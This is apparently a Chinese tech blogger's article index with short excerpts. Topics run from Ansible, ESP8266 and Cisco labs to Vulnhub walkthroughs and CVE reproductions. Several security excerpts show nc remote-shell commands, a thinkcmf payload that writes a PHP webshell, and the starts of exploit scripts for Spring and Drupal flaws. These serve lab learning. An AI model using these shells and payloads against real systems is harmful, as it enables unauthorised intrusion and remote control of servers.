- 博客(98)
- 资源 (54)
- 收藏
- 关注
原创 ansible完全攻略
分割成单个yaml文件,然后再在入口的yaml(mian.yaml)文件中导入其他的功能模块(include)。ansible role可以将不同的功能的yaml文件整合在一起,比如tasks,template,file,等不同功能的模块。playbook文件只要就是实现各种功能,每一个tasks代表一个实现功能,playbook中的功能具有幂等特性。notify: notify是task中的一个子属性,监控我们指定的动作涉及的内容是否发生了变化,比如配置文件。ansible连接主机的属性。
2023-03-20 11:25:36
1072
1
原创 智能wifi插座刷固件
买了两个智德智能插座,某鱼9块9一个,由于原厂的App倒闭,导致不能使用,原本是通过公子小白机器人(从没有听过的机器人😅)进行控制的,也可以通过公子小白APP控制,但是好像也不能用了,就算能用也不太想用,毕竟不想把智能电器暴露在互联网中,就想通过Arduino刷程序只在家庭局域网中进行控制。在用CH340芯片连接芯片之前要先把GPIO0的引脚接地,这样ESP8266就会进入下载模式,但是不用一直接地就可以烧录程序,只要让最开始让芯片进入烧录模式即可。
2023-03-20 11:24:56
3822
1
原创 supervisord安装使用
supervisord是一个c/s模式的进程管理程序,它可以用来监控应用程序的进程,并且可以管理应用程序的start/stop/restart/reload等功能。
2022-07-19 18:53:35
964
原创 Prometheus入门使用(三)
Prometheus通过PromQL表达式定义触发告警条件,满足触发条件之后在web页面显示告警,关联Alertmanager之后就可以通过Alertmanager推送警告信息到不同的平台。
2022-07-19 15:07:30
774
原创 Prometheus入门使用(二)
需要注意的是如果是Prometheus官方的exporter的话,不用另外添加mysql数据源,只要添加Prometheus数据源即可,只要添加地址为http//IP9090就可以查到监控的所有主机的数据(
2022-07-17 21:33:27
802
原创 Arduino Esp8266 Web LED控制
arduino esp8266 web控制和LED控制:web.inoindex.htmlarduino.inoweb.html然后在arduino的项目目录下创建data文件夹,然后把index.html文件放入后,用esp8266fs工具写入到flash中,连接wifi之后就可以了。esp8266fs工具:Releases · esp8266/arduino-esp8266fs-plugin......
2022-06-24 11:35:20
1807
原创 MicroPython Server网页LED开关
最近入手了TPYBoard v202:下面用的是micropython开发的led例程,板子连接wifi后获取到Ip地址,并打印在串口上,通过ip地址用浏览器访问页面,实现控制led开关:效果:我在官方的例程做了稍稍改动,去除了登录页面,美化了一下控制页面:由于esp8266自带内存太小,一次性打开的device.html不可以太大,否则会出现网页文件不全,在手机端无法显示网页,所以一定要注意这个。device.htmlmain.pyserver.zippython还是适用于树莓派之类的性能高的比较合适
2022-06-24 11:28:39
338
原创 CVE-2022-22965复现
简介:在jdk 9+上运行的Spring MVC或Spring WebFlux application可能会导致RCE复现环境:服务启动后,访问即可看到一个演示页面。poc:使用方法:-t 输入目标地址,-c输入执行命令,默认为id
2022-06-10 16:59:27
431
原创 IPv6地址
IPv6IPv6:Internet Protocol Version 6(互联网协议第六版),是由IETF设计的替代IPv4的下一代IP协议,旨在解决IPv4面临的地址耗尽问题。IPv6地址:IPv6地址为128位,16位为一组,一共是8组,每组用16进制表示。ipv6地址总共有2的128次方个地址,有人开玩笑地说IPv6足以可以为世界上的沙子添加IP地址,可见IPv6足以解决IPv4面对的地址不足的问题。IPv6地址类型:IPv4地址分为单播地址,广播地址,和组播地址,它们指定了要与哪台设备(
2022-05-23 20:56:02
7125
原创 STP生成树协议
STP生成树协议:STP选举过程:1选举根桥(Root Bridge)2在每个非根桥上选举一个根端口(Root Port)3选举指定端口(Designated Port)4阻塞剩余端口(Non-Designated Port)STP选举依据:Bridge ID:2字节(16bit)6字节(48bi’t)Bridge ID端口优先级(Priority)默认值为32768(16bit的中间十进制数值),步长为4096(16bit最高4b
2022-05-20 09:20:33
3582
原创 SPAN交换端口分析器
SPANSPAN,全称为Switched Port Analyzer,直译为交换端口分析器。是一种交换机的端口镜像技术。作用主要是为了给某种网络分析器提供网络数据流,SPAN并不会影响源端口的数据交换,它只是将源端口发送或接收的数据包副本发送到监控端口。有hub连接的主机由于处在同一个广播域和冲突域,一个端口所发送的数据,会发往所有的端口,这样我们只要连接上hub,就可以监听连接在hub上的所有流量:交换机和hub不一样,交换机是通过MAC地址表来转发数据的,不存在hub的情况,但是如果想要分析局域
2022-05-18 20:56:55
684
原创 FHRPs(第一跳冗余协议)
FHRPs(第一跳冗余协议):第一跳冗余协议FHRP(first hop redundancy protocol):主要是用来解决网关问题,提高了默认网关的冗余性和负载均衡;其方法是让多台路由器组成一个组并虚拟出一个网关,让其中的一台路由器充当活跃的网关路由器,而另一台或多台其它路由器则处于备用模式;PC通过连接虚拟网关访问外网,当主备路由器进行切换时,由于虚拟路由器没有改变,所以主机仍然保持连接,没有受到故障的影响;当然也可以实现基于多台路由器的冗余备份或负载均衡;在可以使用第一跳冗余协议之前,网关的
2022-05-18 20:56:05
670
原创 链路聚合实验(PT模拟器)
链路聚合:链路聚合:链路聚合 (Link Aggregation),也称为端口捆绑、端口聚集或链路聚集,链路聚合是将多个端口聚合在一起形成1个汇聚组,以实现出/入负荷在各成员端口中的分担。从外面看起来,1个汇聚组好像就是1个端口。优点:提高链路带宽提高可靠性:同组成员彼此动态备份要求:加入链路聚合的端口的带宽,速度,vlan等设置都要一样链路聚合手工模式LACPPAGP名称链路聚合控制协议(IEEE802.3ad)端口聚合协议开放性开放标准思科私有
2022-05-08 20:18:22
2011
原创 小型网络架构模拟实验
小型网络架构模拟实验:最底层交换机为接入层和汇聚层,三层交换机为核心层,两个路由器分别充当网关和ISP,负责ip拨号和nat功能,但是pt模拟器不支持PPPOEnat过载,就只能分配固定外网IP模拟,内网开启EIGRP路由协议,然后再核心层进行路由汇总。三层交换机:sw-l#Switch(config)#ip routingSwitch(config)#int f0/1Switch(config-if)#switchport trunk encapsulation dot1q //封装类
2022-05-06 20:21:44
669
原创 VOIP语音电话配置
VOIP语音电话配置:路由器R0,作为IP电话的网关和dhcp服务器负责分配号码和IP地址:Router(config)#int fa0/0Router(config-if)#ip add 192.168.0.254 255.255.255.0 #添加ip地址Router(config-if)#no shutRouter(config)#telephony-service Router(config-telephony)#max-dn 5 #定义可以允许注册最多的电话号码(针对
2022-05-06 20:20:46
2566
原创 一口气入门计算机网络基础(CCNA)
OSI网络参考模型:计算机网络使用分层模型来描述网络通信的复杂过程,在处理过程中拥有不同功能的协议被按目的分组到定义好的层中。开放系统互联模型,也就是OSI模型,提供了关于网络通信过程的简要描述,由国际标准化组织(ISO)设计并提供了非私有化的协议。OSI模型分为七层:层号层名用途数据单元7应用层为应用程序提供服务数据信息(message)6表示层为应用提供数据的表示形式(数据编码,加密,解密)数据信息(message)5会话层建立,管理,维护会
2022-05-06 19:40:52
7662
原创 单臂路由实现VLAN间通信
单臂路由实现VLAN间通信不同VLAN之间隔离广播域,不能直接在二层上通信,想要在VLAN间通信,需要通过路由器或者三层交换机。单臂路由(router-on-a-stick)是指在路由器的一个接口上通过配置子接口(或“逻辑接口”,并不存在真正物理接口)的方式,实现原来相互隔离的不同VLA之间互联互通。实验拓扑图:实验环境:Cisco Packet Tracer模拟器实验说明:PC0,PC1,PC2属于不同的网段和VlAN,通过SW1相连到路由器R1上,通过在R1上实现单臂路由功能来实现三台P
2022-05-01 22:23:34
8782
3
原创 Spring-CVE-2022-22947复现
Spring-CVE-2022-22947-POC简介:Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。漏洞环境:docker run -d -p 8080:8080 vulhub/spring-cloud-gateway:3.1.0访问8080端口:POC:import requestsimport json
2022-03-26 12:55:41
1380
原创 PyQt简单示例聊天程序
PyQt简单示例聊天程序效果展示:代码:from PyQt5.Qt import *from talk import Ui_Formimport socketimport sysimport timeclass Window(QWidget,Ui_Form): def __init__(self, parent=None, *args, **kwargs): super().__init__(parent, *args, **kwargs) sel
2022-03-25 13:37:09
2215
原创 yuzu模拟器安装设置大全
yuzu模拟器安装设置大全一.简介:yuzu模拟器是由Citra团队使用C++开发的Switch模拟器,更新了很多版本之后,已经可以比较好的运行switch的一些独占游戏,比如动森,宝可梦剑盾,阿尔宙斯等等。使用这款模拟器可以学习体验一下Switch的游戏。二.安装:yuzu模拟器支持linux和Windows系统,并且可以支持手柄(xbox手柄,ps4手柄和Switch手柄)。windows下运行需要Visual C++环境,自行安装即可。yuzu模拟分为两种,一种是免费版本,另一种是付费版
2022-03-22 13:14:34
54642
2
原创 HK1box硬改天线
HK1box硬改天线在2021的中旬入手了hk1box:当时入手的价格是200出头,虽然价格有点高,但是换了好的电源再加上一个好用的遥控器,总体上还不错,并且加上这是新的arm软路由,虽然只有一个千兆网口,但是对比上隔壁的双网口的R1S的arm软路由价格,又能看电视又可以当作软路由的hk1box实在是太香了,虽然只有一个网口,但是好在有usb3.0接USB千兆网卡,也可以和R1S一样的。但是由于盒子本身做工很差,散热也不太如意。随随便便就可以达到50度左右。所以在某宝上买了适配的盒子外壳和散热片,虽
2022-02-24 17:37:23
6534
原创 Vulnhub-vulncms
Vulnhub-vulncmsnmap扫描端口:开放5000端口,8081端口,9001端口。80端口:5000端口(wordpress):8081端口(joomla):9001端口(drupal):drupal7版本存在一个rce,exploit:#!/usr/bin/env python3import requestsimport argparsefrom bs4 import BeautifulSoupdef get_args(): parser = arg
2022-02-22 22:16:03
2320
原创 Vulnhub-shenron-1
nmap扫描端口:nmap 192.168.0.19 -p-???? 开放80端口和22端口web浏览器打开80端口:???? Apache服务的默认页面web扫描器识别到是joomla框架:gobuster扫描joomal后台路径:gobuster.exe dir -u http://192.168.0.19/joomla/ -w dir.txt???? 后台路径是joomla/administrator/index.php登录名和密码在/test/password文件的
2022-01-05 16:43:40
1911
原创 Vulnhub-driftingblues:7
nmap扫描端口:nmap.exe 192.168.0.11 -p-开放的端口有很多,浏览器先打开80端口测试:首先想到先测试一下用户名密码爆破,但是上网搜了一下,这个是一个网络监控框架,并且就有现成的Exploit可以使用,或者直接在msf中搜索就可以。eyesofnetwork 5.1到5.3存在一个代码执行漏洞,而且可以直接获取root权限:#python3 eonrce.py ip:目标url -ip:监听的ip -port:监听的端口python3 eonrce.py h
2022-01-03 18:01:42
566
原创 Vulnhub:hacksudo_search
nmap扫描端口:???? 开放ssh端口和http端口浏览器打开80端口:页面只有一个搜索框,输入之后会跳转到搜索页面。gobuster进行web页面路径爆破:gobuster dir -e -w C:\Users\Administrator\Desktop\gobuster\dir.txt -u 192.168.0.18 | grep -v "403"???? 发现search1.php页面gobuster进行参数fuzz:???? me参数存在文件包含漏洞试着读取一下/e
2022-01-03 16:20:09
2499
原创 log4j2漏洞复现(CVE-2021-44228)
log4j2漏洞复现(CVE-2021-44228)漏洞简介:log4j是Apache公司的一款JAVA日志框架,基本上只要是java的框架都会用到这个log4j框架,所以上周不管是不是IT圈的都几乎被刷屏了,可见这个洞的危害之大,波及范围之广。所以复现一下。影响版本:Apache Log4j 2.x >=2.0-beta9 且 < 2.15.0复现环境1:1.log4shell-vulnerable-app环境:docker run --name vulnerable-a
2021-12-29 01:00:21
3610
原创 nc连接获取shell
1.渗透过程中免不了获取shell,可以通过nc工具连接,当然还有其他很多的工具,只不过nc默认安装在linux中,比较方便。nc正向连接,防火墙不阻挡外来流量:客户端:nc -e cmd 192.168.0.18 4444 #主动连接客户端的4444端口服务端:nc -lvvp 4444 #监听4444端口nc反向连接,防火墙阻挡外部流量:服务端:nc -l -p 4444 -t -e cmd.exe #-t通过telnet模式执行,可以省略客户端:..
2021-12-09 13:16:09
5857
原创 内网穿透之端口转发
1.在后渗透阶段,如果我们拿下了一台服务器的权限,发现在服务器所属的内网中有一台开启了3389或者22端口的主机,但是无法直接连接,是因为目标服务器处在内网中或者没有联网,这个时候我们可以借助内网中另一台可以联网的服务器来作为代理服务器与连接开启3389的服务器进行连接。2.实验环境:系统 用户 桥接 192.168.0.0/24 NAT 192.168.11.0/24 win10 管理员 192.168.0.16 ubuntu1 lion1
2021-12-09 12:55:58
2963
原创 Vulnhub-keyring靶机
keyring下载地址https://download.vulnhub.com/ia/keyring-v1.01.ova1.下载靶机,网络改为桥接模式然后打开靶机,nmap扫描一下:nmap.exe -p- 192.168.0.15开放ssh的22端口和http的80端口,ssh端口无法登录,设置了只能用密钥登录。先注册一个用户,admin用户显示已经被注册了,只能换一个注册:后台非常简陋,看来不是cms,路径扫描找到一个history.php的文件。histor.
2021-12-06 21:48:39
3060
原创 Vulnhub-thales靶机
thales下载地址https://download.vulnhub.com/thales/Thales.zip1.导入virtual box,网络改为桥接模式,打开虚拟机。2.nmap扫描一下端口:开放了8080端口和22端口。3.浏览器打开8080端口:服务是tomcat,版本是9.0.52,没有任意文件读取和写入的漏洞,只能爆破manager app认证4.burp认证爆破,tomcat的账号和密码格式是【用户名:密码】然后经过base64加密进行发送:..
2021-12-03 10:37:35
846
原创 vulnhub-Deathnote靶场
Deathnote下载https://download.vulnhub.com/deathnote/Deathnote.ova1.打开靶机,nmap扫描一下端口:只有22和80端口,打开浏览器,然后修改host文件:IP deathnote.vuln这个靶场是死亡笔记的主题,头像是死亡笔记男主神无月,死亡笔记的持有者之一,外界称为基拉,也就是kira,上面写的是我会干掉你 L,L是剧中的侦探,为了抓捕男主基拉。hint表示线索,让我们寻找notes.txt或者L的评论。...
2021-11-28 18:36:31
3721
原创 vulnhub之ICA1靶机
https://download.vulnhub.com/ica/ica1.ziphttp://ICA-1靶机下载1.下载靶机,virtualbox网络改为桥接模式,然后开机:2.nmap扫描一下端口:nmap 192.168.0.11 -p-有80端口和22端口,先从web端入手:是一个登录界面,用电子邮箱和用户名登录,不打算先用暴力破解,先sqlmap跑一下:python sqlmap.py -r 1.txt不过好像不存在sql注入,只能另辟蹊径,这个是一..
2021-11-24 18:06:10
3246
原创 nivek靶场-vulnhub
https://download.vulnhub.com/hms/niveK.ovahttp://niveK靶场1.下载靶场,打开virtual box导入靶场,网络改为桥接模式,打开虚拟机。2.nmap先来扫描一下端口:nmap 192.168.0.17 -p-扫描出7080为web端口,浏览器打开发现登录页面:抓包一下,看到登录页面有sql注入漏洞:既然存在sql注入,那么就试了一下万能登录,登录成功,进入了后台:进入后台寻找注入和上传点,另外扫描器找...
2021-11-22 10:27:45
2903
原创 thinkcmf任意包含漏洞
thinkcmf影响范围:thinkcmf <= 2.2.2安装好thinkcmf:poc:?a=display&templateFile=README.md通过模板缓存实现的漏洞,可以读取和写入日志文件:写入webshell:?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php..
2021-11-18 15:38:55
2122
原创 DC-2靶场记录
1.下载DC-2靶场:下载地址https://download.vulnhub.com/dc/DC-2.zip2.虚拟机打开靶场改网卡模式为桥接模式,打开虚拟机。如果要是直接访问靶机的IP的80端口是打不开的,会跳转到http://dc-2/,要修改hosts文件,然后就可以访问到了。在hosts文件结尾添加:ip地址 dc-2这是一个wordpress的cms,第一个flag提示我们进行登录并且用cewl生成密码列表。cewl -w dc.txt http://d.
2021-11-17 16:44:52
1023
原创 vulnhub-ted靶场
1.下载靶场:https://download.vulnhub.com/ted/Ted.7zhttps://download.vulnhub.com/ted/Ted.7z2.解压然后用vm打开,网路改为桥接模式:3.浏览器打开默认端口80:有一个登录框:用户名是admin,密码也是admin,但是用了sha方式加密:登入之后,有一个文件搜索框:没有sql注入,试一下文件读取:还存在着一个authenticate.php文件,用php伪协议...
2021-11-17 16:41:31
1336
原创 DC-1靶场(CVE-2018-7600)
1.下载DC-1靶场:DC-1下载地址https://download.vulnhub.com/dc/DC-1.zip2.解压打开靶场,导入虚拟机网络模式改为桥接模式,打开虚拟机。3.浏览器访问80端口,其实也可以先用nmap扫描一下端口。是一个Drupal CMS。4.先挂扫描器走一波。发现存在CVE-2018-7600的Drupal的一个RCE,并且小于7的版本都可以,这个应该就是这个靶场的主要漏洞了。poc如下:漏洞存在,验证 poc:#!/usr/b..
2021-10-14 23:36:27
1934
原创 hackme2-dhcp靶场记录
1.下载靶场下载地址2.打开虚拟机,导入虚拟机后把网络模式由NAT改为桥接模式,启动。先用浏览器访问一下80端口,是一个登录,没有验证码,可以试一下爆破。我这里还是先注册一下,不行再爆破。可以注册,注册登录之后发现这是一个图书系统。搜索一下试试,显示了所有的图书。但凡有搜索的地方,先试一下sql注入,抓包看一下,post有search参数,手工测试一下。search存注入,字符型。联合注入一下,试一下字段数。没有注入成功,盲...
2021-10-10 13:36:06
1337
原创 51单片机仿真例程-模拟交通灯
代码:#include<reg51.h>#define uchar unsigned charvoid delay0_5s(){ uchar i; for(i=0;i<0x0a;i++) { TH0=0x3c; TL0=0xb0; TR0=1; while(!TF0); TF0=0; }}void delay_t(uchar t){ uchar i; for(i=0;i<t;i++) delay0_5s();}void
2021-10-05 10:16:01
696
balenaEtcher-Portable-1.4.9-x64.exe
2020-04-07
NTLite_setup_x64.zip
2020-04-07
SingleFile网页另存为插件.zip
2020-03-22
VMware-Workstation15.4精简版.7z
2020-03-21
PythonPlantsVsZombies-master.zip
2020-03-19
RT_Andriod_raspberry.exe
2020-03-19
img转vhd_vmdk.zip
2020-03-15
树莓派声控脚本python
2019-11-11
PotPlayerSetup1.7.20538-Pub-x64.exe
2019-11-11
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人